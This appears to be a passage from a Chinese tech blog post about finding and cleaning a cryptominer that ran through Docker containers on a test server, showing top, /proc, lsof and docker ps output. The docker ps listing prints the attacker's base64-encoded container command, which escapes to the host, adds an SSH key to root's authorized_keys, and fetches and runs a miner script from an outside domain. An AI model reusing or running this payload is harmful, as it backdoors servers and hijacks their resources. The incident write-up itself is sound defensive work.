<!doctype html>
<html lang="zh-CN">
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <meta name="referrer" content="no-referrer-when-downgrade">
    

    <title>挖矿病毒4-容器挖矿病毒清理 | Anttu&#39;s Blog</title>
    <meta property="og:title" content="挖矿病毒4-容器挖矿病毒清理 - Anttu&#39;s Blog">
    <meta property="og:type" content="article">
        
    <meta property="article:published_time" content='2022-01-26T00:29:47&#43;08:00'>
        
        
    <meta property="article:modified_time" content='2022-01-26T00:29:47&#43;08:00'>
        
    <meta name="Keywords" content="golang,go语言,go语言笔记,anttu,java,博客,bash,linux笔记,python笔记,公众号,小程序">
    <meta name="description" content="挖矿病毒4-容器挖矿病毒清理">
        
    <meta name="author" content="Anttu">
    <meta property="og:url" content="https://anttu.gitee.io/post/2022-01-26-miner_virus_4/">
    <link rel="shortcut icon" href='/favicon.ico'  type="image/x-icon">

    <link rel="stylesheet" href='/css/normalize.css'>
    <link rel="stylesheet" href='/css/style.css'>
    <script type="text/javascript" src="//cdn.bootcdn.net/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

    
    
    
    
    
    
        <link rel="stylesheet" href='/css/asciinema-player.css'>
    
</head>


<body>
    <header id="header" class="clearfix">
    <div class="container">
        <div class="col-group">
            <div class="site-name ">
                
                    <a id="logo" href="https://anttu.gitee.io/">
                        Anttu&#39;s Blog
                    </a>
                
                <p class="description">一位Java开发者，喜欢研究技术，同时也在学习Golang和Python中，对服务器、Linux使用比较熟悉。欢迎添加技术交流QQ群：655158296</p>
            </div>
            <div>
                <nav id="nav-menu" class="clearfix">
                    <a class="current" href="https://anttu.gitee.io/">首页</a>
                    
                    <a  href="https://anttu.gitee.io/archives/" title="归档">归档</a>
                    
                    <a  href="https://anttu.gitee.io/tags/" title="分类">分类</a>
                    
                    <a  href="https://anttu.gitee.io/about/" title="关于">关于</a>
                    
                </nav>
            </div>
        </div>
    </div>
</header>

    <div id="body">
        <div class="container">
            <div class="col-group">

                <div class="col-8" id="main">
                    
<div class="res-cons">
    <style type="text/css">
    .post-toc {
        position: fixed;
        width: 200px;
        margin-left: -210px;
        padding: 5px 10px;
        font-family: Athelas, STHeiti, Microsoft Yahei, serif;
        font-size: 12px;
        border: 1px solid rgba(0, 0, 0, .07);
        border-radius: 5px;
        background-color: rgba(255, 255, 255, 0.98);
        background-clip: padding-box;
        -webkit-box-shadow: 1px 1px 2px rgba(0, 0, 0, .125);
        box-shadow: 1px 1px 2px rgba(0, 0, 0, .125);
        word-wrap: break-word;
        white-space: nowrap;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        z-index: 999;
        cursor: pointer;
        max-height: 70%;
        overflow-y: auto;
        overflow-x: hidden;
    }

    .post-toc .post-toc-title {
        width: 100%;
        margin: 0 auto;
        font-size: 20px;
        font-weight: 400;
        text-transform: uppercase;
        text-align: center;
    }

    .post-toc .post-toc-content {
        font-size: 15px;
    }

    .post-toc .post-toc-content>nav>ul {
        margin: 10px 0;
    }

    .post-toc .post-toc-content ul {
        padding-left: 20px;
        list-style: square;
        margin: 0.5em;
        line-height: 1.8em;
    }

    .post-toc .post-toc-content ul ul {
        padding-left: 15px;
        display: none;
    }

    @media print,
    screen and (max-width:1057px) {
        .post-toc {
            display: none;
        }
    }
</style>
<div class="post-toc" style="position: absolute; top: 188px;">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
        <nav id="TableOfContents">
  <ul>
    <li><a href="#前言">前言</a></li>
    <li><a href="#1分析准备">1、分析准备</a></li>
    <li><a href="#2按步骤排查">2、按步骤排查</a></li>
    <li><a href="#3找到恶意进程">3、找到恶意进程</a></li>
    <li><a href="#4找到程序目录">4、找到程序目录</a></li>
    <li><a href="#5查看进程">5、查看进程</a></li>
    <li><a href="#6查找程序本体">6、查找程序本体</a>
      <ul>
        <li></li>
      </ul>
    </li>
    <li><a href="#7查看镜像">7、查看镜像</a>
      <ul>
        <li></li>
      </ul>
    </li>
    <li><a href="#8停容器">8、停容器</a>
      <ul>
        <li></li>
      </ul>
    </li>
    <li><a href="#9删容器">9、删容器</a></li>
    <li><a href="#10删镜像">10、删镜像</a></li>
    <li><a href="#11入侵原因">11、入侵原因</a></li>
    <li><a href="#12参考">12、参考</a></li>
  </ul>
</nav>
    </div>
</div>
<script type="text/javascript">
    $(document).ready(function () {
        var postToc = $(".post-toc");
        if (postToc.length) {
            var leftPos = $("#main").offset().left;
            if (leftPos < 220) {
                postToc.css({ "width": leftPos - 10, "margin-left": (0 - leftPos) })
            }

            var t = postToc.offset().top - 20,
                a = {
                    start: {
                        position: "absolute",
                        top: t
                    },
                    process: {
                        position: "fixed",
                        top: 20
                    },
                };
            $(window).scroll(function () {
                var e = $(window).scrollTop();
                e < t ? postToc.css(a.start) : postToc.css(a.process)
            })
        }

        if ($("#TableOfContents").children().length < 1) {
            $(".post-toc").remove();
        }
    })
</script>
    <article class="post">
        <header>
            <h1 class="post-title">挖矿病毒4-容器挖矿病毒清理</h1>
        </header>
        <date class="post-meta meta-date">
            2022年1月26日
        </date>
        
        <div class="post-meta">
            <span>|</span>
            
            <span class="meta-category">
                <a href='/categories/mine' target="_blank">mine</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/virus' target="_blank">virus</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/linux' target="_blank">linux</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/check' target="_blank">check</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/docker' target="_blank">docker</a>
            </span>
            
        </div>
        
        
        <div class="post-meta">
            <span id="busuanzi_container_page_pv">|<span id="busuanzi_value_page_pv"></span><span>
                    阅读</span></span>
        </div>
        
        
        <div class="clear" style="display: none">
            <div class="toc-article">
                <div class="toc-title">文章目录</div>
            </div>
        </div>
        
        <div class="post-content">
            <h2 id="前言">前言</h2>
<p>1月26日，运维同学收到告警邮件，告诉我某台测试服务器中了挖矿病毒，心想怎么最近挖矿这么猖狂&hellip;</p>
<h2 id="1分析准备">1、分析准备</h2>
<p>仍然下载是busybox</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wget https://busybox.net/downloads/binaries/1.30.0-i686/busybox 
</span></span><span style="display:flex;"><span>chmod +x busybox
</span></span><span style="display:flex;"><span>cp busybox /usr/bin 
</span></span><span style="display:flex;"><span>busybox  top
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="2按步骤排查">2、按步骤排查</h2>
<p>剩余步骤跟<a href="/post/2021-01-28-miner_virus_2">挖矿病毒2-分析和排查思路</a>一样，只是所有的命令前面是 busybox command<br>
不过这次是容器挖矿，ECS 排查步骤仍然走一遍，但是没啥收货，但是恶意进程还是可以找到的</p>
<h2 id="3找到恶意进程">3、找到恶意进程</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">6
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">7
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">8
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># busybox top</span>
</span></span><span style="display:flex;"><span>top - 14:14:48 up <span style="color:#099">6</span> days, <span style="color:#099">10</span> min,  <span style="color:#099">1</span> user,  load average: 2.06, 2.32, 2.30
</span></span><span style="display:flex;"><span>Tasks: <span style="color:#099">171</span> total,   <span style="color:#099">1</span> running, <span style="color:#099">169</span> sleeping,   <span style="color:#099">0</span> stopped,   <span style="color:#099">1</span> zombie
</span></span><span style="display:flex;"><span>%Cpu<span style="color:#000;font-weight:bold">(</span>s<span style="color:#000;font-weight:bold">)</span>: 50.7 us,  0.7 sy,  0.0 ni, 48.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
</span></span><span style="display:flex;"><span>KiB Mem : <span style="color:#099">16266252</span> total, <span style="color:#099">10225056</span> free,  <span style="color:#099">5006372</span> used,  <span style="color:#099">1034824</span> buff/cache
</span></span><span style="display:flex;"><span>KiB Swap:        <span style="color:#099">0</span> total,        <span style="color:#099">0</span> free,        <span style="color:#099">0</span> used. <span style="color:#099">10917736</span> avail Mem 
</span></span><span style="display:flex;"><span>  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                          
</span></span><span style="display:flex;"><span> <span style="color:#099">4116</span> root      <span style="color:#099">20</span>   <span style="color:#099">0</span> <span style="color:#099">2439464</span>   <span style="color:#099">3272</span>   <span style="color:#099">2132</span> S 200.3  0.0 750:29.39 .ddns
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="4找到程序目录">4、找到程序目录</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">17
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">18
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">19
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">20
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">21
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># cd /proc/4116</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor 4116<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># ls -alrt</span>
</span></span><span style="display:flex;"><span>total <span style="color:#099">0</span>
</span></span><span style="display:flex;"><span>dr-xr-xr-x <span style="color:#099">182</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">20</span> 14:04 ..
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 status
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 stat
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 cwd -&gt; /var/tmp/.crypto/...
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 cgroup
</span></span><span style="display:flex;"><span>dr-xr-xr-x   <span style="color:#099">9</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 .
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 exe -&gt; /var/tmp/.crypto/.../.ddns
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor admin<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># cd /proc/4115/</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor 4115<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># ls -alrt</span>
</span></span><span style="display:flex;"><span>total <span style="color:#099">0</span>
</span></span><span style="display:flex;"><span>dr-xr-xr-x <span style="color:#099">182</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">20</span> 14:04 ..
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 cwd -&gt; /var/tmp/.crypto/...
</span></span><span style="display:flex;"><span>dr-xr-xr-x   <span style="color:#099">9</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 .
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 status
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 stat
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:59 exe -&gt; /var/tmp/.crypto/.../httpd-crypto
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="5查看进程">5、查看进程</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># busybox lsof -i | grep ddns</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      /var/tmp/.crypto/.../.pid
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventpoll<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165876<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165876<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165877<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165877<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventfd<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      /var/tmp/.crypto/.../.ddns.log
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventfd<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:inotify
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventfd<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      /dev/null
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      socket:<span style="color:#000;font-weight:bold">[</span>15167677<span style="color:#000;font-weight:bold">]</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="6查找程序本体">6、查找程序本体</h2>
<p>发现并不在 ECS 上，试了下有 docker 命令，就查看下 docker 镜像清单</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker ps -a</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>CONTAINER ID        IMAGE                                                                 COMMAND                  CREATED             STATUS                       PORTS                                         NAMES
</span></span><span style="display:flex;"><span>fd3a4ea7e1d9        ubuntu                                                                <span style="color:#d14">&#34;/bin/bash /var/tmp/./crypto/.../httpd-crypto&#34;</span>   <span style="color:#099">11</span> hours ago        Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">11</span> hours ago                                                    
</span></span></code></pre></td></tr></table>
</div>
</div><p>如果command无法查看完整，可以用如下命令</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#998;font-style:italic">#  查看完整的command</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker ps --no-trunc -a</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>CONTAINER ID                                                       IMAGE                                                                     COMMAND                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 CREATED             STATUS                       PORTS                                         NAMES
</span></span><span style="display:flex;"><span>d4b3ae6385319554d7cff96aa3259fded0e7a63cdaa61d04d0cb7dbf331dabb7   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKCmNoYXR0ciAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IHRudHJlY2h0IC1SIC1pYSAvcm9vdC8uc3NoLyAyPi9kZXYvbnVsbDsgaWNoZGFyZiAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGwKY2F0IC90bXAvVGVhbVROVC5wdWIgPj4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMKY2F0IC90bXAvVGVhbVROVC5wdWIgPiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5czIKcm0gLWYgL3RtcC9UZWFtVE5ULnB1YgoKCnNzaCAtb1N0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1pIC90bXAvVGVhbVROVCByb290QDEyNy4wLjAuMSAiKGN1cmwgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHxjZDEgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHx3Z2V0IC1xIC1PLSBodHRwOi8vdGVhbXRudC5yZWQvc2gvc2V0dXAvbW9uZXJvb2NlYW5fbWluZXIuc2h8fHdkMSAtcSAtTy0gaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNoKXxiYXNoIgoKcm0gLWYgL3RtcC9UZWFtVE5UCgo= | base64 -d | bash&#39;&#34;</span>   <span style="color:#099">2</span> days ago          Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">2</span> days ago                                                      eloquent_noyce
</span></span><span style="display:flex;"><span>902e4c85e42399df5a15d745f8da91bfaa520cf77754cbbe4bda194fb93ec212   alpineos/dockerapi                                                        <span style="color:#d14">&#34;/pause&#34;</span>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <span style="color:#099">2</span> days ago          Up <span style="color:#099">2</span> days                                                                  intelligent_taussig
